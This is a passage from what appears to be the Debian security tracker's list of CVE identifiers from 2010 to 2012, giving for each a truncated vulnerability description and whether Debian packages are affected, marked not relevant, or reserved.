CVE-2012-4795 RESERVED CVE-2012-4794 RESERVED CVE-2012-4793 RESERVED CVE-2012-4792 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) 
NOT-FOR-US: Microsoft Internet Explorer CVE-2012-4791 (Microsoft Exchange Server 2007 SP3 and 2010 SP1 and SP2 allows remote ...) NOT-FOR-US: Microsoft Exchange Server CVE-2012-4790 RESERVED CVE-2012-4789 RESERVED CVE-2012-4788 RESERVED CVE-2012-4787 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-4786 (The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows ...) NOT-FOR-US: Microsoft Windows CVE-2012-4785 RESERVED CVE-2012-4784 RESERVED CVE-2012-4783 RESERVED CVE-2012-4782 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-4781 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-4780 RESERVED CVE-2012-4779 RESERVED CVE-2012-4778 RESERVED CVE-2012-4777 (The code-optimization feature in the reflection implementation in ...) NOT-FOR-US: Microsoft .NET Framework CVE-2012-4776 (The Web Proxy Auto-Discovery (WPAD) functionality in Microsoft .NET ...) NOT-FOR-US: Microsoft .NET Framework CVE-2012-4775 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Internet Explorer CVE-2012-4774 (Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows ...) NOT-FOR-US: Microsoft Windows CVE-2012-4773 (Multiple cross-site request forgery (CSRF) vulnerabilities in Subrion ...) NOT-FOR-US: Subrion CMS CVE-2012-4772 (SQL injection vulnerability in register/ in Subrion CMS before 2.2.3 ...) NOT-FOR-US: Subrion CMS CVE-2012-4771 (Multiple cross-site scripting (XSS) vulnerabilities in Subrion CMS ...) 
NOT-FOR-US: Subrion CMS CVE-2012-4770 RESERVED CVE-2012-4769 RESERVED CVE-2012-4768 RESERVED CVE-2012-4767 RESERVED CVE-2012-4766 RESERVED CVE-2012-4765 RESERVED CVE-2012-4764 RESERVED CVE-2012-4763 RESERVED CVE-2012-4762 RESERVED CVE-2012-4761 RESERVED CVE-2012-4760 RESERVED CVE-2011-5158 (Multiple untrusted search path vulnerabilities in the DMTGUI2.EXE and ...) NOT-FOR-US: DATEV Grundpaket Basis CVE-2010-5274 (Untrusted search path vulnerability in PKZIP before 12.50.0014 allows ...) NOT-FOR-US: PKZIP CVE-2010-5273 (Untrusted search path vulnerability in Altova DiffDog 2011 Enterprise ...) NOT-FOR-US: Altova DiffDog 2011 Enterprise CVE-2010-5272 (Untrusted search path vulnerability in Altova DatabaseSpy 2011 ...) NOT-FOR-US: Altova DatabaseSpy 2011 CVE-2010-5271 (Untrusted search path vulnerability in Altova MapForce 2011 Enterprise ...) NOT-FOR-US: Altova MapForce 2011 CVE-2010-5270 (Multiple untrusted search path vulnerabilities in Adobe Device Central ...) NOT-FOR-US: Adobe Device Central CVE-2010-5269 (Untrusted search path vulnerability in tbb.dll in Intel Threading ...) NOT-FOR-US: Intel Threading Building Blocks CVE-2010-5268 (Untrusted search path vulnerability in Amazon Kindle for PC 1.3.0 ...) NOT-FOR-US: Amazon Kindle for PC CVE-2010-5267 (Untrusted search path vulnerability in MunSoft Easy Office Recovery ...) NOT-FOR-US: MunSoft Easy Office Recovery CVE-2010-5266 (Untrusted search path vulnerability in VideoCharge Studio 2.9.0.632 ...) NOT-FOR-US: VideoCharge Studio CVE-2010-5265 (Untrusted search path vulnerability in SmartSniff 1.71 allows local ...) NOT-FOR-US: SmartSniff CVE-2010-5264 (Untrusted search path vulnerability in the CExtDWM::CExtDWM method in ...) NOT-FOR-US: Prof-UIS CVE-2010-5263 (Untrusted search path vulnerability in Sothink SWF Decompiler 6.0 ...) NOT-FOR-US: Sothink SWF Decompiler CVE-2010-5262 (Multiple untrusted search path vulnerabilities in libmcl-5.4.0.dll in ...) 
NOT-FOR-US: Gromada Multimedia Conversion Library CVE-2010-5261 (Untrusted search path vulnerability in SnowFox Total Video Converter ...) NOT-FOR-US: SnowFox Total Video Converter CVE-2010-5260 (Untrusted search path vulnerability in Agrin All DVD Ripper 4.0 allows ...) NOT-FOR-US: Agrin All DVD Ripper CVE-2010-5259 (Multiple untrusted search path vulnerabilities in IsoBuster 2.8 allow ...) NOT-FOR-US: IsoBuster CVE-2010-5258 (Untrusted search path vulnerability in Adobe Audition 3.0 build 7283.0 ...) NOT-FOR-US: Adobe Audition CVE-2010-5257 (Multiple untrusted search path vulnerabilities in ArchiCAD 13 and 14 ...) NOT-FOR-US: ArchiCAD CVE-2010-5256 (Untrusted search path vulnerability in CDisplay 1.8.1 allows local ...) NOT-FOR-US: CDisplay CVE-2010-5255 (Untrusted search path vulnerability in UltraISO 9.3.6.2750 allows ...) NOT-FOR-US: UltraISO CVE-2010-5254 (Untrusted search path vulnerability in GFI Backup 3.1 Build 20100730 ...) NOT-FOR-US: GFI Backup CVE-2010-5253 (Untrusted search path vulnerability in WinImage 8.50 allows local ...) NOT-FOR-US: WinImage CVE-2010-5252 (Untrusted search path vulnerability in HTTrack 3.43-9 allows local ...) - httrack (Only affects Windows) CVE-2010-5251 (Multiple untrusted search path vulnerabilities in IBM Lotus Notes 8.5 ...) NOT-FOR-US: IBM Lotus Notes CVE-2010-5250 (Untrusted search path vulnerability in the ...) NOT-FOR-US: Pthreads-win32 CVE-2010-5249 (Untrusted search path vulnerability in Sophos Free Encryption 2.40.1.1 ...) NOT-FOR-US: Sophos Free Encryption CVE-2010-5248 (Untrusted search path vulnerability in UltraVNC 1.0.8.2 allows local ...) NOT-FOR-US: UltraVNC CVE-2010-5247 (Untrusted search path vulnerability in QtWeb Browser 3.3 build 043 ...) NOT-FOR-US: QtWeb Browser CVE-2010-5246 (Multiple untrusted search path vulnerabilities in Maxthon Browser ...) NOT-FOR-US: Maxthon Browser CVE-2010-5245 (Untrusted search path vulnerability in PDF-XChange Viewer 2.0 Build ...) 
NOT-FOR-US: PDF-XChange Viewer CVE-2010-5244 (Untrusted search path vulnerability in SiSoftware Sandra 2010 Lite ...) NOT-FOR-US: SiSoftware Sandra CVE-2010-5243 (Multiple untrusted search path vulnerabilities in Cyberlink Power2Go ...) NOT-FOR-US: Cyberlink Power2Go CVE-2010-5242 (Untrusted search path vulnerability in Sound Forge Pro 10.0b Build 474 ...) NOT-FOR-US: Sound Forge Pro CVE-2010-5241 (Multiple untrusted search path vulnerabilities in Autodesk AutoCAD ...) NOT-FOR-US: Autodesk AutoCAD CVE-2010-5240 (Multiple untrusted search path vulnerabilities in Corel PHOTO-PAINT ...) NOT-FOR-US: Corel PHOTO-PAINT and CorelDRAW CVE-2010-5239 (Untrusted search path vulnerability in DAEMON Tools Lite 4.35.6.0091 ...) NOT-FOR-US: DAEMON Tools Lite and Pro Standard CVE-2010-5238 (Untrusted search path vulnerability in CyberLink PowerDirector ...) NOT-FOR-US: CyberLink PowerDirector CVE-2010-5237 (Untrusted search path vulnerability in CyberLink PowerDirector 7 ...) NOT-FOR-US: CyberLink PowerDirector CVE-2010-5236 (Untrusted search path vulnerability in Roxio Easy Media Creator Home ...) NOT-FOR-US: Roxio Easy Media Creator Home CVE-2010-5235 (Untrusted search path vulnerability in IZArc Archiver 4.1.2 allows ...) NOT-FOR-US: IZArc Archiver CVE-2010-5234 (Multiple untrusted search path vulnerabilities in Camtasia Studio ...) NOT-FOR-US: Camtasia Studio CVE-2010-5233 (Untrusted search path vulnerability in Virtual DJ 6.1.2 Trial b301 ...) NOT-FOR-US: Virtual DJ CVE-2010-5232 (Untrusted search path vulnerability in DivX Plus Player 8.1.0 allows ...) NOT-FOR-US: DivX Plus Player CVE-2010-5231 (Untrusted search path vulnerability in DivX Player 7.2.019 allows ...) NOT-FOR-US: DivX Player CVE-2010-5230 (Multiple untrusted search path vulnerabilities in MicroStation 7.1 ...) NOT-FOR-US: MicroStation CVE-2010-5229 (Untrusted search path vulnerability in 010 Editor before 3.1.3 allows ...) 
NOT-FOR-US: 010 Editor CVE-2010-5228 (Untrusted search path vulnerability in RealPlayer SP 1.1.5 12.0.0.879 ...) NOT-FOR-US: RealPlayer SP CVE-2010-5227 (Untrusted search path vulnerability in Opera before 10.62 allows local ...) NOT-FOR-US: Opera CVE-2010-5226 (Multiple untrusted search path vulnerabilities in Autodesk Design ...) NOT-FOR-US: Autodesk Design Review CVE-2012-4759 (Untrusted search path vulnerability in facebook_plugin.fpi in the ...) NOT-FOR-US: Foxit Reader CVE-2012-4758 (Multiple untrusted search path vulnerabilities in CyberLink ...) NOT-FOR-US: CyberLink PowerProducer CVE-2012-4757 (Multiple untrusted search path vulnerabilities in CyberLink ...) NOT-FOR-US: CyberLink StreamAuthor CVE-2012-4756 (Multiple untrusted search path vulnerabilities in CyberLink LabelPrint ...) NOT-FOR-US: CyberLink LabelPrint CVE-2012-4755 (Untrusted search path vulnerability in SciTools Understand before 2.6 ...) NOT-FOR-US: SciTools Unterstand CVE-2012-4754 (Multiple untrusted search path vulnerabilities in MindManager 2012 ...) NOT-FOR-US: MindManager CVE-2011-5157 (Untrusted search path vulnerability in Attachmate Reflection before ...) NOT-FOR-US: Attachmate Reflection CVE-2011-5156 (Untrusted search path vulnerability in Effective File Search 6.7 ...) NOT-FOR-US: Effective File Search CVE-2011-5155 (Untrusted search path vulnerability in Help & Manual 5.5.1 Build 1296 ...) NOT-FOR-US: Help & Manual 5.5.1 Build CVE-2011-5154 (Multiple untrusted search path vulnerabilities in (1) SAPGui.exe and ...) NOT-FOR-US: SAP GUI CVE-2011-5153 (Untrusted search path vulnerability in FotoSlate 4.0 Build 146 allows ...) NOT-FOR-US: FotoSlate CVE-2011-5152 (Multiple untrusted search path vulnerabilities in ACDSee Photo Editor ...) NOT-FOR-US: ACDSee Photo Editor CVE-2011-5151 (Untrusted search path vulnerability in ACDSee Picture Frame Manager ...) NOT-FOR-US: ACDSee Picture Frame Manager CVE-2010-5225 (Untrusted search path vulnerability in Babylon 8.1.0 r16 allows local ...) 
NOT-FOR-US: Babylon 8.1.0 CVE-2010-5224 (Untrusted search path vulnerability in Cool iPhone Ringtone Maker ...) NOT-FOR-US: Cool iPhone Ringtone Maker CVE-2010-5223 (Multiple untrusted search path vulnerabilities in Phoenix Project ...) NOT-FOR-US: Phoenix Project Manager CVE-2010-5222 (Untrusted search path vulnerability in Ease Jukebox 1.40 allows local ...) NOT-FOR-US: Ease Jukebox CVE-2010-5221 (Untrusted search path vulnerability in STDU Explorer 1.0.201 allows ...) NOT-FOR-US: STDU Explorer CVE-2010-5220 (Untrusted search path vulnerability in MEO Encryption Software 2.02 ...) NOT-FOR-US: MEO Encryption Software CVE-2010-5219 (Untrusted search path vulnerability in SmartFTP 4.0.1140.0 allows ...) NOT-FOR-US: SmartFTP CVE-2010-5218 (Untrusted search path vulnerability in Dupehunter 9.0.0.3911 allows ...) NOT-FOR-US: Dupehunter CVE-2010-5217 (Multiple untrusted search path vulnerabilities in TuneUp Utilities ...) NOT-FOR-US: TuneUp Utilities CVE-2010-5216 (Untrusted search path vulnerability in LINGO 11.0.1.6 and 12.0.2.20 ...) NOT-FOR-US: LINGO CVE-2010-5215 (Multiple untrusted search path vulnerabilities in SWiSH Max3 3.0 ...) NOT-FOR-US: SWiSH Max3 CVE-2010-5214 (Untrusted search path vulnerability in Fotobook Editor 5.0 2.8.0.1 ...) NOT-FOR-US: Fotobook Editor CVE-2010-5213 (Untrusted search path vulnerability in Adobe LiveCycle Designer ...) NOT-FOR-US: Adobe LiveCycle Designer CVE-2010-5212 (Untrusted search path vulnerability in Adobe LiveCycle Designer ES2 ...) NOT-FOR-US: Adobe LiveCycle Designer ES2 CVE-2010-5211 (Untrusted search path vulnerability in ALSee 6.20.0.1 allows local ...) NOT-FOR-US: ALSee CVE-2010-5210 (Untrusted search path vulnerability in Sorax Reader 2.0.3129.70 allows ...) NOT-FOR-US: Sorax Reader CVE-2010-5209 (Multiple untrusted search path vulnerabilities in Nuance PDF Reader ...) NOT-FOR-US: Nuance PDF Reader CVE-2010-5208 (Multiple untrusted search path vulnerabilities in the (1) ...) 
NOT-FOR-US: Kingsoft Office CVE-2010-5207 (Multiple untrusted search path vulnerabilities in CelFrame Office 2008 ...) NOT-FOR-US: CelFrame Office CVE-2010-5206 (Multiple untrusted search path vulnerabilities in e-press ONE Office ...) NOT-FOR-US: ONE Office CVE-2010-5205 (Multiple untrusted search path vulnerabilities in e-press ONE Office ...) NOT-FOR-US: ONE Office CVE-2010-5204 (Multiple untrusted search path vulnerabilities in IBM Lotus Symphony ...) NOT-FOR-US: IBM Lotus Symphony CVE-2010-5203 (Multiple untrusted search path vulnerabilities in NCP Secure ...) NOT-FOR-US: NCP Secure Enterprise CVE-2010-5202 (Untrusted search path vulnerability in JetAudio 8.0.7.1000 Basic ...) NOT-FOR-US: JetAudio CVE-2010-5201 (Untrusted search path vulnerability in MAGIX Samplitude Producer 11 ...) NOT-FOR-US: MAGIX Samplitude Producer CVE-2010-5200 (Untrusted search path vulnerability in KeePass Password Safe before ...) - keepassx (only affects Windows) CVE-2010-5199 (Untrusted search path vulnerability in PhotoImpact X3 13.00.0000.0 ...) NOT-FOR-US: PhotoImpact CVE-2010-5198 (Multiple untrusted search path vulnerabilities in Intuit QuickBooks ...) NOT-FOR-US: Intuit QuickBooks CVE-2010-5197 (Untrusted search path vulnerability in Pixia 4.70j allows local users ...) NOT-FOR-US: Pixia 4.70j CVE-2010-5196 (Untrusted search path vulnerability in KeePass Password Safe before ...) - keepassx (only affects Windows) CVE-2010-5195 (Untrusted search path vulnerability in Roxio MyDVD 9 allows local ...) NOT-FOR-US: Roxio MyDVD 9 CVE-2012-4410 RESERVED NOTE: to be rejected CVE-2012-4753 (Multiple cross-site request forgery (CSRF) vulnerabilities in ownCloud ...) NOTE: http://www.openwall.com/lists/oss-security/2012/09/05/17 NOTE: False assignment, will be rejected, see #688123 CVE-2012-4752 (appconfig.php in ownCloud before 4.0.6 does not properly restrict ...) 
- owncloud 4.0.7debian-1 [wheezy] - owncloud 4.0.4debian2-2 NOTE: http://www.openwall.com/lists/oss-security/2012/09/05/17 CVE-2012-4751 (Cross-site scripting (XSS) vulnerability in Open Ticket Request System ...) - otrs2 3.1.7+dfsg1-6 CVE-2012-4750 RESERVED CVE-2012-4749 RESERVED CVE-2012-4748 RESERVED CVE-2011-3090 (Race condition in Google Chrome before 19.0.1084.46 allows remote ...) - chromium-browser 20.0.1132.21~r139451-1 CVE-2012-4746 (Cross-site request forgery (CSRF) vulnerability in accessaccount.cgi ...) NOT-FOR-US: ZTE ZXDSL CVE-2012-4745 (Cross-site scripting (XSS) vulnerability in admin/login.asp in Acuity ...) NOT-FOR-US: Acuity CMS CVE-2012-4744 (Cross-site scripting (XSS) vulnerability in ssearch.php in the Siche ...) NOT-FOR-US: Zeroboard CVE-2012-4743 (Multiple SQL injection vulnerabilities in ssearch.php in Siche search ...) NOT-FOR-US: Zeroboard CVE-2012-4742 (The web_node_register function in web.pm in PacketFence before 3.0.2 ...) NOT-FOR-US: PacketFence CVE-2012-4741 (The RADIUS extension in PacketFence before 3.3.0 uses a different user ...) NOT-FOR-US: PacketFence CVE-2012-4740 (Cross-site scripting (XSS) vulnerability in the captive portal in ...) NOT-FOR-US: PacketFence CVE-2012-4739 (Multiple cross-site scripting (XSS) vulnerabilities in Barracuda SSL ...) NOT-FOR-US: Barracuda SSL VPN CVE-2012-4738 RESERVED CVE-2011-5150 (Multiple cross-site scripting (XSS) vulnerabilities in SpamTitan 5.07 ...) NOT-FOR-US: SpamTitan 5.07 CVE-2011-5149 (Multiple cross-site scripting (XSS) vulnerabilities in SpamTitan 5.08 ...) NOT-FOR-US: SpamTitan 5.08 CVE-2011-5148 (Multiple incomplete blacklist vulnerabilities in the Simple File ...) NOT-FOR-US: Simple File Upload CVE-2011-5147 (Static code injection vulnerability in ajax_save_name.php in the Ajax ...) NOT-FOR-US: tinymce plugin CVE-2011-5145 (Multiple SQL injection vulnerabilities in Open Business Management ...) 
NOT-FOR-US: Open Business Management CVE-2011-5144 (Open Business Management (OBM) 2.4.0-rc13 and earlier allows remote ...) NOT-FOR-US: Open Business Management CVE-2011-5143 (Multiple cross-site scripting (XSS) vulnerabilities in Open Business ...) NOT-FOR-US: Open Business Management CVE-2011-5142 (Multiple cross-site scripting (XSS) vulnerabilities in Open Business ...) NOT-FOR-US: Open Business Management CVE-2011-5141 (Directory traversal vulnerability in exportcsv/exportcsv_index.php in ...) NOT-FOR-US: Open Business Management CVE-2011-5140 (Multiple SQL injection vulnerabilities in the blog module 1.0 for ...) NOT-FOR-US: DIY CMS CVE-2011-5139 (SQL injection vulnerability in page.php in Pre Studio Business Cards ...) NOT-FOR-US: Pre Studio Business Cards Designer CVE-2011-5138 (Cross-site scripting (XSS) vulnerability in member.php in tForum ...) NOT-FOR-US: tForum CVE-2011-5137 (Multiple SQL injection vulnerabilities in tForum b0.915 allow remote ...) NOT-FOR-US: tForum CVE-2010-5194 (Stack-based buffer overflow in the Image2PDF function in the ...) NOT-FOR-US: Viscom Image Viewer CP Pro CVE-2010-5193 (Stack-based buffer overflow in the TIFMergeMultiFiles function in the ...) NOT-FOR-US: Viscom Image Viewer CP Pro CVE-2012-4736 (The Device Encryption Client component in Sophos SafeGuard Enterprise ...) NOT-FOR-US: Sophos SafeGuard Enterprise CVE-2012-4735 RESERVED {DSA-2567-1} - request-tracker3.8 - request-tracker4 4.0.7-2 CVE-2012-4734 (Request Tracker (RT) 3.8.x before 3.8.15 and 4.0.x before 4.0.8 allows ...) {DSA-2567-1} - request-tracker3.8 - request-tracker4 4.0.7-2 CVE-2012-4733 RESERVED CVE-2012-4732 (Cross-site request forgery (CSRF) vulnerability in Request Tracker ...) {DSA-2567-1} - request-tracker3.8 - request-tracker4 4.0.7-2 CVE-2012-4731 (FAQ manager for Request Tracker (RTFM) before 2.4.5 does not properly ...) 
{DSA-2568-1} - rtfm - request-tracker4 4.0.7-2 CVE-2012-4730 (Request Tracker (RT) 3.8.x before 3.8.15 and 4.0.x before 4.0.8 allows ...) {DSA-2567-1} - request-tracker3.8 - request-tracker4 4.0.7-2 CVE-2012-4729 (Wing FTP Server before 4.1.1 allows remote authenticated users to ...) NOT-FOR-US: Wing FTP Server CVE-2012-4728 RESERVED CVE-2012-4727 RESERVED CVE-2012-4726 RESERVED CVE-2012-4725 RESERVED CVE-2012-4724 RESERVED CVE-2012-4723 RESERVED CVE-2012-4722 RESERVED CVE-2012-4721 RESERVED CVE-2012-4720 RESERVED CVE-2012-4719 RESERVED CVE-2012-4718 RESERVED CVE-2012-4717 RESERVED CVE-2012-4716 RESERVED CVE-2012-4715 (Buffer overflow in LogReceiver.exe in Rockwell Automation RSLinx ...) NOT-FOR-US: Rockwell Automation RSLinx Enterprise CVE-2012-4714 (Integer overflow in RNADiagnostics.dll in Rockwell Automation ...) NOT-FOR-US: Rockwell Automation FactoryTalk Services Platform CVE-2012-4713 (Integer signedness error in RNADiagnostics.dll in Rockwell Automation ...) NOT-FOR-US: Rockwell Automation FactoryTalk Services Platform CVE-2012-4712 (Moxa EDR-G903 series routers with firmware before 2.11 have a ...) NOT-FOR-US: Moxa EDR-G903 CVE-2012-4711 (Buffer overflow in kingMess.exe 65.20.2003.10300 in WellinTech ...) NOT-FOR-US: WellinTech KingView CVE-2012-4710 (Invensys Wonderware Win-XML Exporter 1522.148.0.0 allows remote ...) NOT-FOR-US: Invensys Wonderware Win-XML Exporter CVE-2012-4709 RESERVED CVE-2012-4708 (Stack-based buffer overflow in 3S CODESYS Gateway-Server before ...) NOT-FOR-US: 3S CODESYS Gateway-Server CVE-2012-4707 (3S CODESYS Gateway-Server before 2.3.9.27 allows remote attackers to ...) NOT-FOR-US: 3S CODESYS Gateway-Server CVE-2012-4706 (Integer signedness error in 3S CODESYS Gateway-Server before 2.3.9.27 ...) NOT-FOR-US: 3S CODESYS Gateway-Server CVE-2012-4705 (Directory traversal vulnerability in 3S CODESYS Gateway-Server before ...) 
NOT-FOR-US: 3S CODESYS Gateway-Server CVE-2012-4704 (Array index error in 3S CODESYS Gateway-Server before 2.3.9.27 allows ...) NOT-FOR-US: 3S CODESYS Gateway-Server CVE-2012-4703 (The Emerson DeltaV SE3006 through 11.3.1, DeltaV VE3005 through 10.3.1 ...) NOT-FOR-US: Emerson DeltaV CVE-2012-4702 (360 Systems Maxx, Image Server Maxx, and Image Server 2000 have a ...) NOT-FOR-US: 360 Systems Maxx, Image Server Maxx, and Image Server CVE-2012-4701 (Directory traversal vulnerability in Tridium Niagara AX 3.5, 3.6, and ...) NOT-FOR-US: Tridium Niagara CVE-2012-4700 (Multiple buffer overflows in an ActiveX control in PE3DO32A.ocx in ...) NOT-FOR-US: IntegraXor SCADA Server CVE-2012-4699 RESERVED CVE-2012-4698 (Siemens RuggedCom Rugged Operating System (ROS) before 3.12, ROX I OS ...) NOT-FOR-US: Siemens RuggedCom Rugged Operating System CVE-2012-4697 RESERVED CVE-2012-4696 (Buffer overflow in Beijer ADP 6.5.0-180_R1967 and 6.5.1-186_R2942, and ...) NOT-FOR-US: Beijer CVE-2012-4695 (LogReceiver.exe in Rockwell Automation RSLinx Enterprise CPR9, ...) NOT-FOR-US: Rockwell Automation RSLinx Enterprise CVE-2012-4694 (Moxa EDR-G903 series routers with firmware before 2.11 do not use a ...) NOT-FOR-US: Moxa EDR-G903 CVE-2012-4693 (Invensys Wonderware InTouch 2012 R2 and earlier and Siemens ...) NOT-FOR-US: Invensys Wonderware InTouch CVE-2012-4692 RESERVED CVE-2012-4691 (Memory leak in Siemens Automation License Manager (ALM) 4.x and 5.x ...) NOT-FOR-US: Siemens Automation License Manager CVE-2012-4690 (Rockwell Automation Allen-Bradley MicroLogix controller 1100, 1200, ...) NOT-FOR-US: Rockwell CVE-2012-4689 (Integer overflow in CimWebServer.exe in GE Intelligent Platforms ...) NOT-FOR-US: Proficy CVE-2012-4688 (The Central application in i-GEN opLYNX before 2.01.9 allows remote ...) NOT-FOR-US: Central application in i-GEN opLYNX CVE-2012-4687 (Post Oak AWAM Bluetooth Reader Traffic System does not use a ...) 
NOT-FOR-US: Post Oak CVE-2012-4686 (SQL injection vulnerability in announcement.php in vBulletin 4.1.10 ...) NOT-FOR-US: vBulletin CVE-2012-4685 (Cross-site scripting (XSS) vulnerability in Arbor Networks Peakflow SP ...) NOT-FOR-US: Arbor Networks Peakflow SP CVE-2012-4684 (The alert functionality in bitcoind and Bitcoin-Qt before 0.7.0 ...) - bitcoin 0.7.2-1 CVE-2012-4683 (Unspecified vulnerability in bitcoind and Bitcoin-Qt allows attackers ...) - bitcoin 0.7.2-1 (bug #688813) CVE-2012-4682 (Unspecified vulnerability in bitcoind and Bitcoin-Qt allows attackers ...) - bitcoin 0.7.2-1 (bug #688813) CVE-2011-5136 (showImg.php in EPractize Labs Subscription Manager, possibly 1.0, ...) NOT-FOR-US: EPractize Labs Subscription Manager CVE-2011-5135 (Multiple SQL injection vulnerabilities in the save_connection function ...) NOT-FOR-US: DoceboLMS CVE-2011-5134 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: JCE component for Joomla! CVE-2011-5133 (Unspecified vulnerability in MyBB before 1.6.5 has unknown impact and ...) NOT-FOR-US: MyBB CVE-2011-5132 (Cross-site scripting (XSS) vulnerability in MyBB before 1.6.5 allows ...) NOT-FOR-US: MyBB CVE-2011-5131 (Cross-site request forgery (CSRF) vulnerability in global.php in MyBB ...) NOT-FOR-US: MyBB CVE-2011-5130 (dev/less.php in Family Connections CMS (FCMS) 2.5.0 - 2.7.1, when ...) NOT-FOR-US: Family Connections CMS CVE-2011-5129 (Heap-based buffer overflow in XChat 2.8.9 and earlier allows remote ...) - xchat (unimportant; bug #686454) CVE-2011-5128 (Multiple cross-site scripting (XSS) vulnerabilities in the Adminimize ...) NOT-FOR-US: Adminimize plugin for Wordpress CVE-2012-4737 (channels/chan_iax2.c in Asterisk Open Source 1.8.x before 1.8.15.1 and ...) {DSA-2550-1} - asterisk 1:1.8.13.1~dfsg-1 (bug #680470) CVE-2012-XXXX - juju 0.5.1-2 (bug #685728) CVE-2012-4681 (Multiple vulnerabilities in the Java Runtime Environment (JRE) ...) 
	- openjdk-7 7u3-2.1.2-1
	- openjdk-6
CVE-2012-4680 (Directory traversal vulnerability in the XML Server in IOServer before ...)
	NOT-FOR-US: IOServer
CVE-2012-4679 (Cross-site scripting (XSS) vulnerability in admin/login.php in ...)
	- newscoop (bug #604113)
CVE-2012-4678 (munin-cgi-graph for Munin 2.0 rc4 does not delete temporary files, ...)
	- munin 2.0~rc6-1 (low; bug #668667)
	[squeeze] - munin (Only affects 2.x branch)
CVE-2012-4677 (Tunnelblick 3.3beta20 and earlier allows local users to gain ...)
	NOT-FOR-US: Tunnelblick
CVE-2012-4676 (The errorExitIfAttackViaString function in Tunnelblick 3.3beta20 and ...)
	NOT-FOR-US: Tunnelblick
CVE-2012-4675 (Cross-site scripting (XSS) vulnerability in PluXml 5.1.6 allows remote ...)
	NOT-FOR-US: PluXml
CVE-2012-4674 (PluXml before 5.1.6 allows remote attackers to obtain the installation ...)
	NOT-FOR-US: PluXml
CVE-2012-4673 (SQL injection vulnerability in application/controllers/invoice.php in ...)
	NOT-FOR-US: Neoinvoice
CVE-2012-4672 (Apple iChat Server does not verify that a request was made for an XMPP ...)
	NOT-FOR-US: Apple iChat Server
CVE-2012-4671 (psyced before 20120821 does not verify that a request was made for an ...)
	NOT-FOR-US: psyced
CVE-2012-4670 (Tigase XMPP Server before 5.1.0 does not verify that a request was ...)
	NOT-FOR-US: Tigase
CVE-2012-4669 (M-Link R14.6 before R14.6v14 and R15.1 before R15.1v10 does not verify ...)
	NOT-FOR-US: M-Link
CVE-2012-4666
	RESERVED
CVE-2012-4665
	RESERVED
CVE-2012-4664
	RESERVED
CVE-2012-4663 (The DCERPC inspection engine on Cisco Adaptive Security Appliances ...)
	NOT-FOR-US: Cisco
CVE-2012-4662 (The DCERPC inspection engine on Cisco Adaptive Security Appliances ...)
	NOT-FOR-US: Cisco
CVE-2012-4661 (Stack-based buffer overflow in the DCERPC inspection engine on Cisco ...)
	NOT-FOR-US: Cisco
CVE-2012-4660 (The SIP inspection engine on Cisco Adaptive Security Appliances (ASA) ...)
	NOT-FOR-US: Cisco
CVE-2012-4659 (The AAA functionality in the IPv4 SSL VPN implementations on Cisco ...)
	NOT-FOR-US: Cisco
CVE-2012-4658
	RESERVED
CVE-2012-4657
	RESERVED
CVE-2012-4656
	RESERVED
CVE-2012-4655 (The WebLaunch feature in Cisco Secure Desktop before 3.6.6020 does not ...)
	NOT-FOR-US: Cisco Secure Desktop
CVE-2012-4654
	RESERVED
CVE-2012-4653
	RESERVED
CVE-2012-4652
	RESERVED
CVE-2012-4651
	RESERVED
CVE-2012-4650
	RESERVED
CVE-2012-4649
	RESERVED
CVE-2012-4648
	RESERVED
CVE-2012-4647
	RESERVED
CVE-2012-4646
	RESERVED
CVE-2012-4645
	RESERVED
CVE-2012-4644
	RESERVED
CVE-2012-4643 (The DHCP server on Cisco Adaptive Security Appliances (ASA) 5500 ...)
	NOT-FOR-US: Cisco
CVE-2012-4642
	RESERVED
CVE-2012-4641
	RESERVED
CVE-2012-4640
	RESERVED
CVE-2012-4639
	RESERVED
CVE-2012-4638
	RESERVED
CVE-2012-4637
	RESERVED
CVE-2012-4636
	RESERVED
CVE-2012-4635
	RESERVED
CVE-2012-4634
	RESERVED
CVE-2012-4633
	RESERVED
CVE-2012-4632
	RESERVED
CVE-2012-4631
	RESERVED
CVE-2012-4630
	RESERVED
CVE-2012-4629 (The Cisco ASA-CX Context-Aware Security module before 9.0.2-103 for ...)
	NOT-FOR-US: Cisco ASA
CVE-2012-4628
	RESERVED
CVE-2012-4627
	RESERVED
CVE-2012-4626
	RESERVED
CVE-2012-4625
	RESERVED
CVE-2012-4624
	RESERVED
CVE-2012-4623 (The DHCPv6 server in Cisco IOS 12.2 through 12.4 and 15.0 through 15.2 ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-4622 (Cisco IOS XE 03.02.00.XO.15.0(2)XO on Catalyst 4500E series switches, ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-4621 (The Device Sensor feature in Cisco IOS 15.0 through 15.2 allows remote ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-4620 (Cisco IOS 12.2 and 15.0 through 15.2 on Cisco 10000 series routers, ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-4619 (The NAT implementation in Cisco IOS 12.2, 12.4, and 15.0 through 15.2 ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-4618 (The SIP ALG feature in the NAT implementation in Cisco IOS 12.2, 12.4, ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-4617 (The BGP implementation in Cisco IOS 15.2, IOS XE 3.5.xS before 3.5.2S, ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-4616 (Directory traversal vulnerability in the Web UI in EMC Data Protection ...)
	NOT-FOR-US: EMC Data Protection Advisor
CVE-2012-4615 (EMC Smarts Network Configuration Manager (NCM) before 9.1 uses a ...)
	NOT-FOR-US: EMC
CVE-2012-4614 (The default configuration of EMC Smarts Network Configuration Manager ...)
	NOT-FOR-US: EMC
CVE-2012-4613 (EMC RSA Data Protection Manager Appliance 2.7.x and 3.x before 3.2.1 ...)
	NOT-FOR-US: EMC RSA Data Protection Manager Appliance
CVE-2012-4612 (Cross-site scripting (XSS) vulnerability in EMC RSA Data Protection ...)
	NOT-FOR-US: EMC RSA Data Protection Manager Appliance
